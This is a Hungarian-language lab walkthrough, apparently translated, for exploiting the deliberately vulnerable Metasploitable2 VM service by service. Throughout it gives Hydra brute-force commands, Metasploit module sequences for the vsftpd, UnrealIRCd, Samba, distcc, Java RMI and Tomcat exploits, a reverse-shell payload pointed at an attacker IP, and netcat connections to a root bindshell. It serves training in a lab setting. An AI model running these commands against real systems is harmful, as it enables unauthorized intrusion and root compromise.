Metasploitable2

A Metasploitable egy szándékosan sebezhető Linux virtuális gép.

Ez a VM használható biztonsági képzésre, biztonsági eszközök tesztelésére és gyakori behatolásvizsgálati technikák gyakorlására.

Telepítés és konfiguráció

A Metasploitable 2 (Damn vulnerable machine for penetration testing)

Megszerezzük ezt a Metasploiable2 gépet a https://information.rapid7.com/download-metasploitable-2017.html

Telepítési folyamat:

  1. Nyissa meg a VirtualBox-ot, és kattintson az “Új” gombra egy új virtuális gép létrehozásához
  2. Tipusozza be a virtuális gép nevét(Metasploitable2)
  3. Kiosztja a memória mennyiségét(Lehetőleg, de nem 512mb alatt)
  4. Válassza ki a Meglévő merevlemez fájl használatát
  5. Válassza ki a vmdk fájlt, amit a Rapid7-től letöltött
  6. Kattintson a Create…!!! Sikeresen telepítettük a Metasploitable2-t, Most itt az ideje a hálózati beállítások konfigurálásának.

A telepítés után módosítsuk a hálózati adapter beállításait az alábbiak szerint :

Hálózaton belüli beállítás: Beállítások/Hálózat/Adapter Válassza ki az Ethernet vagy a Vezeték nélküli

A Speciális lapon válassza ki: Promiscuous Mode as Allow All

Bootolja a Metasploitable2 gépet és próbáljon meg bejelentkezni a megadott hitelesítő adatokkal a Banner-en…!!!!

Keresd meg a gép IP-címét az alábbiak segítségével. parancs a terminálban

ifconfig

Ez minden a beállításhoz….Kezdjük el a hackelést…

Scanning

Scanning the Matasploitable 2

Amint észrevettük a gép IP címe 192.168.0.130

Elkezdjük a szkennelést az Nmap-pal, ami a Kali Linux része

nmap -sV -p- 192.168.0.130

Az összes port kihasználása különböző technikákkal :

Módszer 1:

Login with Anonymous as username and no password.

Ha több információra van szükséged az Anonymous FTP-ről, itt találsz.

https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol

ftp 192.168.0.130

Módszer 2 :

Brutális erőszakkal a Hydra segítségével, de szükséged van egy egyéni felhasználónév- és jelszólistára.

hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V

Veszi az egyes felhasználóneveket és jelszavakat a megadott fájlokból, és megpróbál bejelentkezni a cél FTP szolgáltatásba.

Mihelyt megtalálta a hitelesítő adatokat, közvetlenül bejelentkezhet.

A felhasználói fiókba történő bejelentkezés után a Privilege escalation elvégzésével root hozzáférést kaphat.

3. módszer :

FTP kihasználása a Metasploit keretrendszeren keresztül

nyissa meg a Metasploit keretrendszer konzolját, és keressen rá a vsftpd Backdoor exploitra

msfconsole
Search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor

show options

set RHOSTS 192.168.0.130 --> <target IP address>exploit

Gratulálunk, hogy root hozzáférést kapott

22-SSH

A Secure Shell (SSH) egy kriptográfiai hálózati protokoll a hálózati szolgáltatások biztonságos működtetésére nem biztonságos hálózaton keresztül.

A SSH kihasználása különböző technikákkal

1. módszer

Felhasználónév és jelszó feltörése a Hydra segítségével

A Hydra egy beépített eszköz a Kali-Linuxban, amelyet a Brute force támadás egy olyan próbálkozási módszer, amelyet az alkalmazási programok használnak titkosított adatok, például jelszavak vagy Data Encryption Standard (DES) kulcsok dekódolására, kimerítő erőfeszítéssel (brute force használatával), nem pedig intellektuális stratégiák alkalmazásával.

hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>

Módszer 2

Megnyitja a Metasploit keretrendszert

Megnyitja a terminált és beírja ezeket a parancsokat :

service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login

beállítja ezt a segédprogramot és megnézi, mit igényel.

set RHOSTS <target IP Address> --> in my case 192.168.0.130

Beállítja az előre meghatározott felhasználónevek listáját és jelszavak listáját

set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit

Az időalapú felhasználónevek és jelszavak listáját veszi és Értesít a felhasználónév: jelszóval és bejelentkezik ezekkel a hitelesítő adatokkal.

ssh username@targetipaddress

A felhasználói hozzáféréssel rendelkezik, nem tudja elvégezni az összes feladatot, ezért megpróbál root hozzáférést szerezni a Privilege escalation elvégzésével.

23-TELNET

A Telnet egy egyszerű, szöveges alapú hálózati protokoll, amelyet távoli számítógépek elérésére használnak TCP/IP hálózatokon, például az interneten keresztül. A Telnetet 1969-ben hozták létre és indították el, és történelmileg azt mondhatjuk, hogy ez volt az első internet.

telnet <target IP Address> --> 192.168.0.130

Egyértelmezés szerint Grab Metasploitable 2 banner, azt mutatja, hogy Login with msfadmin/msfadmin to get a start. Csak adja meg ezeket a hitelesítő adatokat, és már bent is van.

25-SMTP

Az SMTP a TCP/IP protokoll alkalmazási rétegének része. Az SMTP a “tárolás és továbbítás” nevű folyamat segítségével mozgatja az e-maileket a hálózatokon és azokon keresztül. Szorosan együttműködik a Mail Transfer Agent (MTA) nevű eszközzel, hogy a kommunikációt a megfelelő számítógépre és e-mail postafiókba küldje.

1. módszer:

A Metasploit használatával

A Metasploit indítása a következő parancsok végrehajtásával

service postgresql startmsfconsole -qsearch smtp_version

.

use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run

Az SMTP a Simple Mail Transport Protocol rövidítése és egy szerver-szerver-kiszolgáló protokoll, és helyi adatbázist vezet a felhasználókról, akiknek e-maileket kell küldenie és fogadnia.

Az SMTP egy sor paranccsal rendelkezik. A 25-ös porton keresztül a “netcat” segítségével csatlakozunk a célpontunkhoz, és megpróbáljuk megszerezni ezt az adatbázis e-maileket.

Nyissunk egy új terminált és írjuk be:

nc 192.168.0.130 25

Most a kapcsolat létrejött, ellenőrizhetjük az “SMTP” parancsokkal

Type: vrfy user

vrfy (Ez egy nem- http://www.tcpipguide.com/free/t_SMTPCommands-2.htm

Method 2

Using smtp_enum

This is can be done by Metasploit

search smtp_enum

use auxiliary/scanner/smtp/smtp_enum

show optionsset RHOST 192.168.0.130exploit

Ez a módszer felsorolást használ az SMTP szolgáltatásban lévő felhasználók e listájának kiderítésére.

Később a NetCat segíthet abban, hogy fordított kapcsolatot létesítsünk ezzel a felhasználóval.

139&445 Netbios-SSN

A Samba egy nyílt forráskódú projekt, amelyet széles körben használnak Linux és Unix számítógépeken, hogy azok együtt tudjanak működni a Windows fájl- és nyomtatási szolgáltatásaival.

A Samba-t akár Active szerverként is használhatjuk a bejelentkezés, hitelesítés és hozzáférés-szabályozás kezelésére egy Windows hálózaton.

Keresés az exploitra

use exploit/multi/samba/usermap_script

Az exploit lehetőségeinek megtekintéséhez

show optionsSet RHOST192.168.0.130 (Target IP address)

A payload beállítása

Show payloadsSet payload cmd/unix/reverse

A payloadhoz szükséges argumentumok beállítása

.

Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444

Az ellenőrzés, ha minden szükséges argumentum kitöltésre került

exploit

1099-Java-RMI

A távoli módszerhívás (RMI) egy olyan API, amely lehetővé teszi, hogy egy objektum meghívjon egy módszert egy másik címtartományban létező objektumon, amely lehet ugyanazon a gépen vagy egy távoli gépen.

A java-RMI-kiszolgáló kihasználása

Keresd meg az exploitot

search java_rmi_server

Válaszd ki az exploitot a rangja szerint. például a “kiváló” jobban működik, mint a “normál”.

use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit

Elérést kaptunk a célgéphez.

1524-BINDSHELL

A bind shell egyfajta shell, amelyben a célgép megnyit egy kommunikációs portot vagy egy listenert az áldozat gépén, és várja a bejövő kapcsolatot. A támadó ezután csatlakozik az áldozat gépének listeneréhez, ami aztán kód vagy parancs végrehajtásához vezet a szerveren.

Exploitation

Ez egy root shell, így a netcat szolgáltatáson keresztül tudunk csatlakozni.

nc <target ip address> 1524

Gratulálunk, Ön most már root felhasználó.

2121-ProFTPD

A port kihasználása előtt szükség van a bejelentkezési adatokra, így mivel tudjuk, hogy a módszer Brute-force technikával kapjuk meg, A ProFTPd-t telnettel érhetjük el, Itt használjuk a felhasználót: user.

telnet <Taget IP Address> <Port Number>USER <username>
PASS <password>

Ez egy normál felhasználó, Próbáljuk meg a Privilege Escalationt a root irányítás megszerzéséhez.

3306-MYSQL

Módszer 1:

Keresd meg az exploitot

search scanner/mysql/mysql_login

use auxiliary/scanner/mysql/mysql_login

.

Néha előfordulhat, hogy üres jelszóval rendelkezik a MySQL. Így ezt közvetlenül kihasználhatjuk.

Megjegyzés: alapértelmezés szerint a BLANK_PASSWORDS-t hamisnak mutatja, állítsuk igazra.

set BLANK_PASSWORDS as true

Módszer:2

Ebben a módszerben a MySQL-t fogjuk kihasználni a parancs segítségével, megadva a root felhasználónevet és a célpont IP címét.

mysql -u root -h <target's IP>

3632-DISTCCD

A disztcc egy olyan eszköz, amely a forráskód fordítását gyorsítja fel számítógépes hálózaton keresztül történő elosztott számítás segítségével. Megfelelő konfigurációval

a distcc drámaian csökkentheti egy projekt fordítási idejét

A 3632-es port kihasználása a distcc használatával

.exec

Open msfconsole and search for distcc_exec

search distcc_execshow options

Set required arguments to exploit

set RHOSTS <target-ip>exploit

We got Shell Access…Próbáljuk meg a jogosultságok kiterjesztését a magasabb jogosultságokhoz

A PostgreSQL kihasználása a postgre_payload segítségével

Msfconsole megnyitása & postgre_payload keresése

.

search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options

Szükséges argumentumok beállítása az exploithoz

set RHOSTS <target-ip>

Az alapértelmezés szerint, a felhasználónév postgres

exploit

Sikeresen bejelentkezett a postgresql…Szerezzünk egy shell-t további dolgok elvégzéséhez…

Kipróbáljuk a jogosultságok kiterjesztését…Jó tanulást..!!!

5900-VNC

Nyissa meg az msfconsole-t és keresse meg a vnc_login

search vnc_loginuse auxiliary/scanner/vnc/vnc_login

show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit

Ez a módszer a Linux vagy Unix vagy Windows operációs rendszereken üzemeltetett VNC szoftverek kihasználására szolgál a hitelesítési sebezhetőséggel.

Próbáljon meg csatlakozni a vnc-hez ezzel a jelszóval

A Vnc Viewer megnyitása a terminálban &Írd be az IP-címet és csatlakozz

a bejelentkezési prompt felugrik. és kéri a hitelesítő adatok megadását

Majd adja meg a jelszót és kattintson az OK gombra.

Voilaaa…!!!! hozzáférése van…Tudom, hogy most mire gondol…Ne szórakozzon a dolgok körül..boldog tanulást.

6000-X11

Az X Window System (más néven X) a UNIX-alapú operációs rendszerekben elterjedt, bitképes megjelenítésre szolgáló ablakrendszer. Az X biztosítja a GUI-alapú környezet alapvető keretrendszerét.

A távoli X11-kiszolgáló bárhonnan fogad kapcsolatokat, ahonnan internetkapcsolathoz lehet jutni. Ez felel a grafikus kártyákhoz, a beviteli eszközökhöz és a megjelenítő képernyőhöz való hozzáférésért akár számítógépen, akár vezeték nélküli eszközön.

A 6000-es port kihasználása ssh használatával

ssh -X -l msfadmin 192.168.0.122

A fenti parancsban az ‘X’ az összes port továbbítását engedélyezi, a felhasználónév és a célpont IP címének megadásával megkapjuk a shell

6667 & 6697 UnrealIRCD

Az UnrealIRCd egy nyílt forráskódú IRC szerver, amely 1999 óta több ezer hálózatot szolgál ki. Linuxon, OS X-en és Windowson fut

Az UnrealIRCd egy rendkívül fejlett IRCd, amely nagy hangsúlyt fektet a modularitásra, a fejlett és jól konfigurálható konfigurációs fájlra. A legfontosabb funkciók közé tartozik az SSL

Az UnrealIRCd az egyik legnépszerűbb és legteljesebb funkcióval rendelkező IRC daemon, és a legtöbb IRC szerveren használják

Ezt a szervert úgy írják le, hogy talán a legtöbb biztonsági funkcióval rendelkezik az IRC szerverek közül.

A használt protokollok:

Feltárjuk ezt az IRC-kiszolgálót.

1. módszer: a 6667-es porton

search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options

Az exploithoz szükséges argumentumok beállítása

set RHOSTS <target-ip>

.

alapértelmezés szerint az exploit

run (or) exploit

Heyyy…Gyökeret eresztettünk… A szélén élünk…

Módszer 2: Ezúttal a portot 6697

set RHOSTS <target-ip>set RPORT 6697

És másodszor is root-ot kaptunk…Try to Exploit this…Happy learning

8180-TOMCAT

Apache Tomcat a Java Servlet, JavaServer Pages, Java Expression Language és WebSocket technológiák nyílt forráskódú implementációja. A Tomcat egy “tiszta Java” HTTP webkiszolgáló környezetet biztosít, amelyben Java kód futtatható.

Az Apache-Tomcat kihasználása

Ez két lépésben végezhető el:

Open msfconsole & search for tomcat_mgr_login

search tomcat_mgr_loginset RHOSTS <target-ip>

show options

Az exploit alapértelmezett felhasználóneveket & jelszólistákat rendel. Az exploithoz tartozó argumentumok beállítása után Type exploit (vagy) run

run

Veszi ugyanazt a felhasználónevet és jelszót és megadja a következő exploitnak.

keressük meg a tomcat manager exploitokat

search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options

Adjuk meg a RHOSTS, RPORT, és HttpPassword, HttpUsername értékeket, amelyeket a tomcat login exploitból kaptunk, majd futtassuk az exploitot.

msfconsole ki tudta rendelni a megfelelő payload egy exploit, Ezért kaptuk meterpreter…

8787-Ruby-drb

dRuby egy elosztott objektum rendszer Ruby. Tiszta Ruby nyelven íródott, és annak protokollját használja.

Nincs szükség kiegészítő szolgáltatásokra azokon kívül, amelyeket a Ruby futási ideje biztosít, mint például a TCP sockets.

search drb_remote_codeexec

Az exploithoz szükséges argumentumok beállítása

show optionsset RHOSTS <target-ip>exploit (or) run

Gratulálunk, hogy root shell hozzáférést kapott…próbáljon meg néhány shell parancsot használni.

Vélemény, hozzászólás?

Az e-mail-címet nem tesszük közzé.